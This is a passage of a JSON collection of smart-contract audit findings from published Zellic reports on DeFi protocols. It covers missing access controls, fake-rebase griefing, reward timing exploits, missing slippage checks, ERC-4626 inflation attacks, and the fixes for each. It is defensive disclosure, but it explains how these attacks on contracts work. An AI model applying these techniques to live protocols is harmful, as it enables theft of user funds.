minimum amount of tokens. The client has acknowledged and fixed this issue by setting a minimum deposit and withdrawal amount. This was fixed in commit 1944cc8f. Zellic Sanic Pte. Ltd.", + "html_url": "https://github.com/Zellic/publications/blob/master/Cega - Zellic Audit Report.pdf" + }, + { + "title": "3.8 Missing checks and some access controls on critical func- tions", + "labels": [ + "Zellic" + ], + "body": "Target: FCNProduct Category: Business Logic Likelihood: N/A As explained by Cega, Severity: Informational : Informational The knock-in (KI) feature provides downside protection for investors\u2019 deposited capital. Specifically, investors will receive 100% of their initial investment in the FCN even if crypto asset prices are falling. In this case, unless crypto asset prices fall by 50% or more versus the day the vault started, investors\u2019 capital will be protected (unlike vanilla option strategies). 
If, however, the FCN does KI, the principal returned at expiry is equal to the lesser of 100% or the fallen asset price percentage of its initial price. To determine if a knock-in event has occurred, Cega uses option barriers. It is safe to assume that investors will choose their investments by carefully considering a few factors. One of these factors may be to check what the knock-in barrier level is set to in relation to the price volatility of the option asset tokens. For example, if the token price is highly volatile, and the knock-in barrier level is at 90%, then there is a high chance that a knock-in event will occur, which may cause the investor to decide against investing in that specific vault. Currently, there exist three functions that the trader admin can use to add, update, and remove knock-in barriers. These are the addOptionBarrier(), updateOptionBarrier(), and removeOptionBarrier() functions, respectively. An important characteristic of these functions is that they do not require the vault to be in any specific state, meaning the trader admin can add or update option barriers at any time, even after the investor\u2019s deposits are locked in. Furthermore, the parameters of a knock-in barrier can be arbitrary, as there are no sanity checks to ensure they are within certain limits. function addOptionBarrier(address vaultAddress, OptionBarrier calldata optionBarrier) public onlyTraderAdmin { FCNVaultMetadata storage metadata = vaults[vaultAddress]; metadata.optionBarriers.push(optionBarrier); metadata.optionBarriersCount++; } This will reduce the investor\u2019s trust in the protocol because although they might note a very low knock-in barrier level initially (i.e., a low chance of a knock-in event occurring), they will know that the level may be raised at any moment, which makes the investment inherently risky. There also exists a setKnockInStatus() function that the trader admin can use to arbitrarily set a vault\u2019s knock-in status to true. Finally, the trader admin can also use the oracle\u2019s updateRoundData() function to arbitrarily control the option asset token price returned by the oracle. This could also be used to trigger a knock-in event. Investors\u2019 trust in the protocol is significantly reduced due to missing checks and incorrect access controls in critical state-modifying functions. For the option barrier functionality, consider requiring a vault state of VaultStatus.NotTraded to modify any option barriers in the vault. For the setKnockInStatus() function, consider removing it completely. Alternatively, place it behind the onlyDefaultAdmin modifier instead. For the updateRoundData() function, consider changing its access control such that only the default admin multi-sig or the operator admin role can call it. The client has acknowledged and fixed all of the above issues according to our recommendations. This was fixed in commit 834fe7ed.", + "html_url": "https://github.com/Zellic/publications/blob/master/Cega - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Griefing opportunity may cause users to lose funds", + "labels": [ + "Zellic" + ], + "body": "Target: TokenVault.sol Category: Business Logic Likelihood: High Severity: High Impact: High The calculation of lastMul to account for rebase tokens is incorrect and can lead to devaluation of user funds deposited in the vault. function updateBalance(uint fnftId, uint incomingDeposit) internal { ... if(asset != 
address(0)){ currentAmount = IERC20(asset).balanceOf(address(this)); } else { // Keep us from zeroing out zero assets currentAmount = lastBal; } tracker.lastMul = lastBal == 0 ? multiplierPrecision : multiplierPrecision * currentAmount / lastBal; ... } The TokenVault supports rebase tokens with a dynamic supply to achieve certain economic goals, such as pegging a token to an asset. In TokenVault, we can see that the updated lastMul is derived from the TokenVault's current balance (currentAmount) divided by lastBal. This ratio checks whether the asset has rebased since the last interaction, signaling an increase or decrease in supply. However, an attacker may transfer ERC20 tokens directly to the vault, inflating currentAmount, leading to an inflated lastMul, thus emulating a rebase. The deposit with inflated lastMul would be devalued when lastMul is reset back in the next updateBalance call. Proof of Concept A sample proof-of-concept can be found here. The output is as follows: Minted one FNFT with id -> 0 Current value of FNFT-0 is 10 Transferred 10 tokens to fake a rebase Minted another FNFT with id -> 1 and 100 depositAmount The value should be 100 But the value is 50 The PoC mints two FNFTs. The first one proceeds as normal. Then, tokens are transferred directly to the vault. This transfer emulates a \u201cfake\u201d rebase. As a result, when the second FNFT is minted, it has value 50 rather than the correct value of 100. The victim minting an FNFT following the fake rebase action permanently loses funds. This poses a very large griefing vector for Revest. Alter the logic to properly account for rebase tokens. The Revest team has fixed this issue by proposing a move to a new and improved TokenVaultV2 design, and by deprecating the handling of rebase tokens in TokenVault.", + "html_url": "https://github.com/Zellic/publications/blob/master/Revest Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Certain functions\u2019 access controls are unnecessarily lax", + "labels": [ + "Zellic" + ], + "body": "Target: TokenVault.sol Category: Business Logic Likelihood: N/A Severity: N/A Impact: N/A Description function createFNFT(uint fnftId, IRevest.FNFTConfig memory fnftConfig, uint quantity, address from) external override { ... } The function createFNFT should not be external, as all of its internal function calls are restricted to onlyRevestController. The issue currently has no security impact, but developers should abide by the principle of least privilege. Limiting a contract\u2019s attack surface is a crucial way to mitigate future risks and reduces the overall likelihood and severity of compromises. Add the onlyRevestController modifier to createFNFT to restrict access control. The issue has been acknowledged by the Revest team.
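A minimal sketch of the recommended change, assuming the onlyRevestController modifier referenced above is available in this contract:
function createFNFT(uint fnftId, IRevest.FNFTConfig memory fnftConfig, uint quantity, address from) external override onlyRevestController {
    // body unchanged; the modifier now enforces the restriction its callees already apply
}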
", + "html_url": "https://github.com/Zellic/publications/blob/master/Revest Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Batched mints can be rejected by a single recipient", + "labels": [ + "Zellic" + ], + "body": "Target: FNFTHandler.sol Category: Business Logic Likelihood: Low Severity: Low Impact: Low function mintBatchRec(address[] calldata recipients, uint[] calldata quantities, uint id, uint newSupply, bytes memory data) external override onlyRevestController { supply[id] += newSupply; fnftsCreated += 1; for(uint i = 0; i < quantities.length; i++) { _mint(recipients[i], id, quantities[i], data); } } A batched mint from mintBatchRec is susceptible to being cancelled by a single recipient failing the ERC-1155 acceptance check. Gas is wasted, and other willing recipients do not receive the FNFTs. The batched mint execution has to be retried. Recommendations Execute the batched mint in a try-catch loop and refund if a mint fails. If intended, document this behavior. The issue has been acknowledged by the Revest team, and a fix is pending.", + "html_url": "https://github.com/Zellic/publications/blob/master/Revest Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.1 An attacker may claim risk-free rewards without risking their staked capital", + "labels": [ + "Zellic" + ], + "body": "Target: Vault.sol Category: Business Logic Likelihood: High Severity: High Impact: High The Example Vault aims for an APR of 20%. At the beginning of every new period (1 day), the vault distributes the daily interest and calculates the new token price. The caveat here is that users can stake capital at the end of a period and reap rewards instantly at the beginning of the next period. Depositing on the last block before the start of a new period and redeeming it in the next block would essentially guarantee an instant riskless profit. function compute() public { uint256 currentTimestamp = block.timestamp; // solhint-disable-line not-rely-on-time uint256 newPeriod = DateUtils.diffDays(startOfYearTimestamp, currentTimestamp); if (newPeriod <= currentPeriod) return; for (uint256 i = currentPeriod + 1; i <= newPeriod; i++) { _records[i].apr = _records[i - 1].apr; _records[i].totalDeposited = _records[i - 1].totalDeposited; uint256 diff = uint256(_records[i - 1].apr) * USDF_DECIMAL_MULTIPLIER * uint(100)/ uint256(365); _records[i].tokenPrice = _records[i - 1].tokenPrice + (diff / uint256(10000)); _records[i].dailyInterest = _records[i - 1].totalDeposited * uint256(_records[i - 1].apr) / uint256(365) / uint256(100); } currentPeriod = newPeriod; }
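To make the arithmetic behind the impact estimate below concrete: each period, the loop above raises tokenPrice by a fixed increment of apr/365 percent of the initial price unit, so the daily rate is 20 / 365 \u2248 0.0548%. A deposit of 1,000,000 USDC staked one block before a period boundary can therefore be redeemed one block later for roughly 1,000,000 \u00d7 0.000548 \u2248 548 USDC of risk-free gain (the figure below rounds the daily rate down to 0.054%, i.e., about $540).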
Zellic Fractal Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Lack of slippage checks on DEX swaps", + "labels": [ + "Zellic" + ], + "body": "Target: Multiple contracts Severity: High : High Category: Business Logic Likelihood: High In many separate areas of the project, interactions and swaps with Uniswap are han- dled through DexLibrary. There is no slippage check on these interactions and are thus vulnerable to market manipulation. function swap( uint256 amountIn, address fromToken, address toToken, IPair pair ) internal returns (uint256) { (address token0, ) = sortTokens(fromToken, toToken); (uint112 reserve0, uint112 reserve1, ) = pair.getReserves(); if (token0 != fromToken) (reserve0, reserve1) = (reserve1, reserve0); uint256 amountOut1 = 0; uint256 amountOut2 = getAmountOut(amountIn, reserve0, reserve1); if (token0 != fromToken) (amountOut1, amountOut2) = (amountOut2, amountOut1); safeTransfer(fromToken, address(pair), amountIn); pair.swap(amountOut1, amountOut2, address(this), ZERO_BYTES); return amountOut2 > amountOut1 ? amountOut2 : amountOut1; } Due the nature of most of the vulnerable methods being onlyOwner or onlyAdmin, the quantity of funds accumulated would be rather large along with the swap amount. An attacker could sandwich the the swap transaction, artificially inflating the spot price and profiting off the manipulated market conditions when the swap executes. Set the default slippage to 0.5% for Uniswap, customizable for bigger trades. Zellic Fractal Protocol The issue has been acknowledged by Fractal. Zellic Fractal Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Potential lock-up of funds in FractalVaultV1 as anySwap Router is not approved", + "labels": [ + "Zellic" + ], + "body": "Target: FractalVaultV1.sol Severity: Medium : Medium Category: Business Logic Likelihood: Medium The FractalVaultV1 does not approve the anySwap router before executing anySwapOut- Underlying, and would fail all the withdrawal attempts. function withdrawToLayerOne(...))) { ...)) emit WithdrawToLayerOne(msg.sender, amount); anySwapRouter.anySwapOutUnderlying(anyToken, anyswapRouter, amount, chainId); } The FractalVaultV1 will never be able to withdraw to LayerOne. Though the recoverERC20 function can be used in an emergency to manually transfer funds as a backup func- tionality; however, this is likely not the intended flow of funds. Approve AnySwap router before anySwapOutUnderlying. The issue has been acknowledged by Fractal. Zellic Fractal Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Potential lock-up of funds in the event of insufficient AnySwap liquidity", + "labels": [ + "Zellic" + ], + "body": "Target: FractVaultV1.sol Severity: Low : Low Category: Business Logic Likelihood: Low AnySwap cross-chain transfers will provide the underlying token to the destination only if sufficient liquidity exists on AnySwap reserves. If not, AnySwap will mint a wrapped token (AnyToken) that can be redeemed later when liquidity is available. The FractVaultV1 does not handle that. Even if reserves are checked before executing a swap, since AnySwap is not atomic with no guarantee on order of transactions, simultaneous swaps by other users would lead to locked tokens. 
FractalVaultV1 currently has no way to redeem the AnyTokens to the underlying tokens. However, the recoverERC20 method can be used by the owner to manually recover the anySwap tokens, mitigating this issue\u2019s impact. Add functionality to redeem AnyTokens to their underlying. The issue has been acknowledged by Fractal.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol - Zellic Audit Report.pdf"
  },
  {
    "title": "3.5 Access Control functions should emit events",
    "labels": [
      "Zellic"
    ],
    "body": "Target: Mintable.sol, AddressWhitelist.sol, Migrations.sol Severity: Informational Impact: Informational Category: Access Control Likelihood: N/A Several methods in multiple contracts related to access control, such as whitelisting and minter/burner roles, do not emit events. In the case of a compromise, events allow for secure and early detection of breaches and security incidents. Add events to all functions relating to access control. The issue has been acknowledged by Fractal.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol - Zellic Audit Report.pdf"
  },
  {
    "title": "3.6 Multiple internal inconsistencies",
    "labels": [
      "Zellic"
    ],
    "body": "Target: Multiple contracts Severity: Informational Impact: Informational Category: Business Logic Likelihood: N/A In several areas of the project, internal inconsistencies were noted, such as a lack of checks that were present in other areas, or non-standard practices in general. The respective areas affected: FractalVaultV1: withdrawToLayerOne - no chainId checks. DexLibrary.sol: convertRewardTokensToDepositTokens - lack of the slippage checks mentioned. Mintable.sol: mint - Transfer event should mint from address 0. These issues are minor and do not pose a security hazard at present. More broadly, however, this is a source of developer confusion and a general coding hazard. Internal inconsistencies may lead to future problems or bugs. Avoiding internal inconsistencies also makes it easier for developers to understand the code and helps any potential auditors more quickly and thoroughly assess it. Consider changing the code to fix the inconsistencies. The issue has been acknowledged by Fractal. 3.7 Lack of documentation Target: Multiple contracts Severity: Informational Impact: Informational Category: Business Logic Likelihood: N/A Several files in the project are lacking documentation, the following being: DateUtils.sol: diffDays, _daysToDate, timestamp, getYear, _daysFromDate; Migrations.sol: setCompleted. This is a source of developer confusion and a general coding hazard. Lack of documentation, or unclear documentation, is a major pathway to future bugs. It is best practice to document all code. Documentation also helps third-party developers integrate with the platform, and helps any potential auditors more quickly and thoroughly assess the code. Add documentation to the affected functions. The issue has been acknowledged by Fractal.
",
    "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol - Zellic Audit Report.pdf"
  },
  {
    "title": "3.2 Risk of ERC-4626 inflation attack",
    "labels": [
      "Zellic"
    ],
    "body": "Target: BeefyWrapper Category: Code Maturity Likelihood: N/A Severity: Informational Impact: Informational Empty ERC-4626 vaults can be manipulated to inflate the price of a share and cause depositors to lose their deposits due to rounding in favor of the vault. In empty (or nearly empty) ERC-4626 vaults, deposits are at high risk of being stolen through front-running with a donation to the vault that inflates the price of a share. This is variously known as a donation or inflation attack and is essentially a problem of slippage. This attack allows malicious actors to steal deposits into pools, which will result in potentially notable losses for users. For protection against inflation attacks, we suggest upgrading the ERC4626Upgradeable OpenZeppelin contract used in BeefyWrapper.sol to the current version (4.9). The latest version of the ERC4626Upgradeable OpenZeppelin contract explains their proposed solution to this type of attack: The _decimalsOffset() corresponds to an offset in the decimal representation between the underlying asset\u2019s decimals and the vault decimals. This offset also determines the rate of virtual shares to virtual assets in the vault, which itself determines the initial exchange rate. While not fully preventing the attack, analysis shows that the default offset (0) makes it non-profitable, as a result of the value being captured by the virtual shares (out of the attacker\u2019s donation) matching the attacker\u2019s expected gains. With a larger offset, the attack becomes orders of magnitude more expensive than it is profitable. This issue has been fixed by Beefy Finance in commit 39a7e1a. 4 Threat Model This provides a full threat model description for various functions. As time permitted, we analyzed each function in the contracts and created a written threat model for some critical functions. A threat model documents a given function\u2019s externally controllable inputs and how an attacker could leverage each input to cause harm. Not all functions in the audit scope may have been modeled. The absence of a threat model in this section does not necessarily suggest that a function is safe.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Beefy Wrapper - Zellic Audit Report.pdf"
  },
  {
    "title": "4.1 Module: BeefyWrapperFactory.sol Function: clone(address _vault) This function can be used to create a new clone of the BeefyWrapper contract using an immutable proxy that delegatecalls the wrapper contract code. Inputs",
    "labels": [
      "Zellic"
    ],
    "body": "_vault \u2013 Control: Arbitrary. \u2013 Constraints: None. \u2013 Impact: Address of the contract to clone. Branches and code coverage (including function calls) Intended branches Deploys the immutable proxy contract and calls initialize on it. [x] Test coverage Function call analysis rootFunction -> IWrapper(proxy).initialize(...) \u2013 What is controllable? All arguments; _vault is controlled, and name and symbol are obtained by calling _vault. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts would abort the transaction; reentrancy is possible but not a concern.
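For reference, the clone-and-initialize flow described above can be sketched as follows; the interfaces and the derived name/symbol scheme are assumptions based on the call analysis, not Beefy's actual implementation:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {Clones} from \"@openzeppelin/contracts/proxy/Clones.sol\";

// Assumed shape of the wrapper's initializer, per the call described above.
interface IWrapper {
    function initialize(address vault, string memory name, string memory symbol) external;
}

// Assumed metadata getters on the vault being wrapped.
interface IVaultMeta {
    function name() external view returns (string memory);
    function symbol() external view returns (string memory);
}

contract WrapperFactorySketch {
    address public immutable implementation;

    constructor(address _implementation) {
        implementation = _implementation;
    }

    // Deploys an EIP-1167 minimal proxy that delegatecalls the wrapper
    // implementation, then initializes it against the given vault.
    function clone(address _vault) external returns (address proxy) {
        proxy = Clones.clone(implementation);
        IWrapper(proxy).initialize(
            _vault,
            string(abi.encodePacked(\"Wrapped \", IVaultMeta(_vault).name())),
            string(abi.encodePacked(\"w\", IVaultMeta(_vault).symbol()))
        );
    }
}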
",
    "html_url": "https://github.com/Zellic/publications/blob/master/Beefy Wrapper - Zellic Audit Report.pdf"
  },
  {
    "title": "4.2 Module: BeefyWrapper.sol Function: unwrap(uint256 amount) This function can be used to unwrap a given amount of wrapped tokens in exchange for the original Beefy tokens. Inputs",
    "labels": [
      "Zellic"
    ],
    "body": "amount \u2013 Control: Arbitrary. \u2013 Constraints: None directly (user balance must be sufficient). \u2013 Impact: Amount of tokens to be unwrapped. Branches and code coverage (including function calls) Intended branches Burns the specified amount of wrapped tokens and transfers the corresponding amount of vault tokens to the caller. [ ] Test coverage Negative behavior Reverts if the user balance is insufficient. [ ] Negative test Reverts if the transfer of unwrapped tokens fails. [ ] Negative test Function call analysis rootFunction -> _burn(msg.sender, amount) \u2013 What is controllable? amount. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible. rootFunction -> IERC20Upgradeable(vault).safeTransfer(msg.sender, amount) \u2013 What is controllable? amount. \u2013 If return value controllable, how is it used and how can it go wrong? Not controllable. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up (even though they should not be possible); reentrancy is not possible (vault is considered trusted). Function: wrap(uint256 amount) This function can be used to wrap a given amount of Beefy vault tokens into ERC-4626 wrapped tokens. Inputs amount \u2013 Control: Arbitrary. \u2013 Constraints: None (directly, caller balance must be sufficient and the wrapper must be approved). \u2013 Impact: Amount to wrap. Branches and code coverage (including function calls) Intended branches Transfers vault tokens to the wrapper contract and mints the corresponding amount of wrapper tokens. [ ] Test coverage Negative behavior Reverts if the vault token transfer fails (e.g., user balance is insufficient). [ ] Negative test Function call analysis rootFunction -> IERC20Upgradeable(vault).safeTransferFrom(msg.sender, address(this), amount) \u2013 What is controllable? amount. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible (vault is considered trusted). rootFunction -> _mint(msg.sender, amount) \u2013 What is controllable? amount. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts and reentrancy are not possible. Function: _deposit(address caller, address receiver, uint256 assets, uint256 shares) This internal function overrides the default ERC-4626 implementation and is invoked by the public, inherited functions deposit and mint. Inputs caller \u2013 Control: None. \u2013 Constraints: None. \u2013 Impact: Caller performing the deposit. receiver \u2013 Control: Arbitrary. \u2013 Constraints: None. \u2013 Impact: Receiver of the minted shares. assets \u2013 Control: Arbitrary (when coming from deposit). \u2013 Constraints: None (directly, caller balance must be sufficient). \u2013 Impact: Amount of assets to wrap.
shares \u2013 Control: Arbitrary (when coming from mint). \u2013 Constraints: None (directly, corresponding caller asset balance must be sufficient). \u2013 Impact: Intended to be the amount of shares to mint but ignored and recomputed internally. Branches and code coverage (including function calls) Intended branches Transfers asset from the caller to the wrapper contract, calls the vault to deposit the asset, and mints the corresponding amount of shares to the receiver. [ ] Test coverage Negative behavior Reverts if the asset transfer fails (e.g., caller balance is insufficient). [ ] Negative test Reverts if the vault deposit fails. [ ] Negative test Function call analysis rootFunction -> IERC20Upgradeable(asset()).safeTransferFrom(caller, address(this), assets) \u2013 What is controllable? assets. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible (asset is considered trusted). rootFunction -> IERC20Upgradeable(vault).balanceOf(address(this)) \u2013 What is controllable? Nothing. \u2013 If return value controllable, how is it used and how can it go wrong? Used as the initial vault tokens\u2019 balance. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible (vault is considered trusted). rootFunction -> IVault(vault).deposit(assets) \u2013 What is controllable? assets. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible (vault is considered trusted). rootFunction -> shares = IERC20Upgradeable(vault).balanceOf(address(this)) \u2013 What is controllable? Nothing. \u2013 If return value controllable, how is it used and how can it go wrong? Used as the final vault balance; the difference between the final and initial balance is used as the amount of shares to be minted. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible (vault is considered trusted). rootFunction -> _mint(receiver, shares) \u2013 What is controllable? Nothing directly. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts and reentrancy are not possible. Function: _withdraw(address caller, address receiver, address owner, uint256 assets, uint256 shares) This internal function overrides the default ERC-4626 implementation and is invoked by the public, inherited functions withdraw and redeem. Inputs caller \u2013 Control: None. \u2013 Constraints: None. \u2013 Impact: Caller performing the withdrawal. receiver \u2013 Control: Arbitrary. \u2013 Constraints: None. \u2013 Impact: Receiver of the withdrawal. owner \u2013 Control: None. \u2013 Constraints: If not the sender, caller must have allowance. \u2013 Impact: Owner of the shares to withdraw. assets \u2013 Control: Arbitrary (when coming from withdraw). \u2013 Constraints: None (directly, owner share balance must be sufficient). \u2013 Impact: Amount of assets to unwrap. shares \u2013 Control: Arbitrary (when coming from redeem). \u2013 Constraints: None (directly, owner share balance must be sufficient). \u2013 Impact: Amount of shares to unwrap.
Branches and code coverage (including function calls) Intended branches Spends allowance if caller is not owner. [ ] Test coverage Burns owner shares, withdraws shares from the vault, and transfers min(assets, balance) to the receiver. [ ] Test coverage Negative behavior Reverts if the caller does not have sufficient allowance. [ ] Negative test Reverts if owner balance is insufficient. [ ] Negative test Reverts if vault withdrawal fails. [ ] Negative test Reverts if asset transfer fails (should be impossible). [ ] Negative test Function call analysis rootFunction -> _spendAllowance(owner, caller, shares) \u2013 What is controllable? owner and shares. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible. rootFunction -> _burn(owner, shares) \u2013 What is controllable? owner and shares. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible. rootFunction -> IVault(vault).withdraw(shares) \u2013 What is controllable? shares. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible (vault is considered trusted). rootFunction -> IERC20Upgradeable(asset()).balanceOf(address(this)) \u2013 What is controllable? Nothing. \u2013 If return value controllable, how is it used and how can it go wrong? Used to limit the maximum withdrawal. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible (asset is considered trusted). rootFunction -> IERC20Upgradeable(asset()).safeTransfer(receiver, assets) \u2013 What is controllable? receiver and assets. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible (asset is considered trusted). 5 Assessment Results At the time of our assessment, the reviewed code was deployed to the Ethereum Mainnet. During our assessment on the scoped Beefy Wrapper contracts, we discovered two findings, both of which were informational in nature. Beefy Finance acknowledged all findings and implemented fixes.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Beefy Wrapper - Zellic Audit Report.pdf"
  },
  {
    "title": "3.1 Borrower cannot withdraw funds",
    "labels": [
      "Zellic"
    ],
    "body": "Target: OpenTermLoan Category: Business Logic Likelihood: Low Severity: High Impact: High In certain situations where the price drops below the maintenance collateral ratio, the borrower is unable to withdraw the principal and activate the loan. function withdraw() public onlyBorrower { require(loanState == FUNDED, \"Invalid loan state\"); // Enforce the maintenance collateral ratio, if applicable _enforceMaintenanceRatio(); loanState = ACTIVE; // Send principal tokens to the borrower _withdrawPrincipalTokens(_effectiveLoanAmount, borrower); // Emit the event emit OnBorrowerWithdrawal(_effectiveLoanAmount); } The borrower is not able to withdraw their funds.
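For illustration, a minimal sketch of the remediation recommended below, with the maintenance-ratio check removed from withdraw; identifiers are taken from the excerpt above, and the surrounding contract state is assumed:

function withdraw() public onlyBorrower {
    require(loanState == FUNDED, \"Invalid loan state\");
    // The _enforceMaintenanceRatio() call is removed here, so a price drop
    // below the maintenance collateral ratio cannot strand the principal.
    loanState = ACTIVE;
    // Send principal tokens to the borrower
    _withdrawPrincipalTokens(_effectiveLoanAmount, borrower);
    emit OnBorrowerWithdrawal(_effectiveLoanAmount);
}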
The only way for the borrower to regain access to their funds is for the lender to call the loan and return the funds. Remove _enforceMaintenanceRatio in withdraw. Fractal has addressed the issue by implementing a fix in commit 4888d6b6, which removes the _enforceMaintenanceRatio call in withdraw.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol v2- Zellic Audit Report.pdf"
  },
  {
    "title": "3.2 Initialize function can be called multiple times",
    "labels": [
      "Zellic"
    ],
    "body": "Target: GlpSpotMarginAccount Category: Business Logic Likelihood: Low Severity: Medium Impact: Medium The initialize function can be called multiple times. function initializeSubAccount( address loanAddress, address feeCollectorAddress, address paraswapAddress, address tokenTransferProxyAddress, uint256 feeAmount) public onlyOperator { // @audit shouldn't be callable more than once. _loanContract = loanAddress; _feeCollector = feeCollectorAddress; _paraswap = paraswapAddress; _tokenTransferProxy = tokenTransferProxyAddress; _feeBips = feeAmount; } This can lead to unexpected behavior, since the state variable changes will break the logic of the contract. The impact of this finding is diminished by the restriction that only the operator has the authority to invoke this function. We recommend adding a check to ensure that the function is not called more than once, such as using OpenZeppelin\u2019s initializer modifier. Fractal has addressed the issue by implementing a fix in commit d463725e through the use of the initializer modifier. The function has also been renamed to initialize to match the naming convention of the other contracts.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol v2- Zellic Audit Report.pdf"
  },
  {
    "title": "3.3 Insufficient slippage protection",
    "labels": [
      "Zellic"
    ],
    "body": "Target: Project Wide Category: Business Logic Likelihood: Medium Severity: Medium Impact: Medium The codebase has several areas where slippage checks are either absent or insufficient to guard against MEV attacks. Some of these areas are listed below. All instances of depositCurveConvex in the various strategies: function depositCurveConvex( uint256 amount, uint256[3] calldata amounts, uint256 slippageBips, address proxyVault) public onlyOperator { ... uint256 calcAmount = ICurveSwap(FRAXZAPPOOL).calc_token_amount(ALUSDFRAXPOOL, amounts, true); uint256 minAmount = (calcAmount * (BIPS_DIVISOR - slippageBips)) / BIPS_DIVISOR; ICurveSwap(FRAXZAPPOOL).add_liquidity(ALUSDFRAXPOOL, amounts, minAmount); } In this instance, minimum amounts are calculated from on-chain prices that will have already been skewed; therefore, the add_liquidity operation will always pass. All instances of withdrawCurveConvex in the various strategies: function withdrawCurveConvex( bytes32 kek_id, address proxyVault, uint256 slippageBips) public onlyOperator { ... uint256 calcAmount = ICurveSwap(FRAXZAPPOOL).calc_withdraw_one_coin(ALUSDFRAXPOOL, lpTokenBalance, 2); uint256 minAmount = (calcAmount * (BIPS_DIVISOR - slippageBips)) / BIPS_DIVISOR; ICurveSwap(FRAXZAPPOOL).remove_liquidity_one_coin(ALUSDFRAXPOOL, lpTokenBalance, 2, minAmount); ... } In this instance, minimum amounts are calculated from on-chain prices that will have already been skewed; therefore, the remove_liquidity_one_coin operation will always pass.
This also applies to addLiquidityAndDeposit and removeLiquidityAndWithdraw in FractStableSwap. The same issue is present for the minUsdcAmount function in GlpUnwind. Then there are slippage issues in borrow pools, where the manipulation of borrow pools can result in fewer tokens than expected. In the Aave strategies, these exchanges are protected by a min amount number. However, in the Compound strategies, there is no minimum check for borrowed tokens received. function mintAndBorrow( address mintAddress, address borrowAddress, uint256 mintAmount, uint256 collateralFactorBips ) public onlyOperator { require(mintAddress != address(0), \"0 Address\"); require(borrowAddress != address(0), \"0 Address\"); require(mintAmount > 0, \"Mint failed\"); require(collateralFactorBips <= BIPS_DIVISOR, \"Collateral factor\"); _mint(mintAddress, mintAmount); _borrow(borrowAddress, collateralFactorBips); } In FractAaveConvexFraxUsdc, the interface for the CRVFRAXPOOL is incorrect, and a timestamp is supplied instead of a min amount. ICurveSwap(CRVFRAXPOOL).add_liquidity(amounts, block.timestamp + 10); //@audit timestamp supplied for min amount In FractMoonwellStrategy.sol, in the harvestByMarket function, both swaps pass a 0 for the min amount out. function harvestByMarket(address mintAddress, address borrowAddress) public onlyOperator { ... _swapTokens(MOONWELL_TOKEN, underlyingAddress, rewardBalance, 0); //@audit pass a 0 for min amount out _swapNativeToken(underlyingAddress, movrBalance, 0); //@audit pass a 0 for min amount out } Insufficient slippage protection can result in the loss of user funds. Our recommendation is to incorporate minimum amount arguments obtained from off-chain sources and verify that the slippage is within acceptable limits. Fractal has addressed the issue by implementing fixes in commit 5da58e4c8 by adding a minimum amount parameter to every impacted function.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol v2- Zellic Audit Report.pdf"
  },
  {
    "title": "3.4 State variables are shadowed by function parameters",
    "labels": [
      "Zellic"
    ],
    "body": "Target: FractCompoundStrategy, SwapContractManager Severity: Low Impact: Low Category: Coding Mistakes Likelihood: Low Two state variables are shadowed by function parameters. This applies to counterPartyRegistry in SwapContractManager and comptroller in FractCompoundStrategy. constructor( address feeCollectorAddr, address counterPartyRegistryAddr ) { require(feeCollectorAddr != address(0), '0 address'); require(counterPartyRegistryAddr != address(0), '0 address'); feeCollector = feeCollectorAddr; counterPartyRegistry = counterPartyRegistryAddr; } function deployTotalReturnSwapContract( uint8 direction, address operator, address counterPartyRegistry, // ... This can lead to unexpected behavior, since the state variables will be shadowed by the function parameters. We recommend opting for a different name for the function parameters or removing the state variables. Fractal has addressed the issue by implementing a fix in commits 66ef7c87f and dc471fdd by removing and/or renaming the local variables.
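To illustrate the issue just described, a minimal hypothetical example of the shadowing pattern and the conventional rename fix (the contract and function names are illustrative only):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

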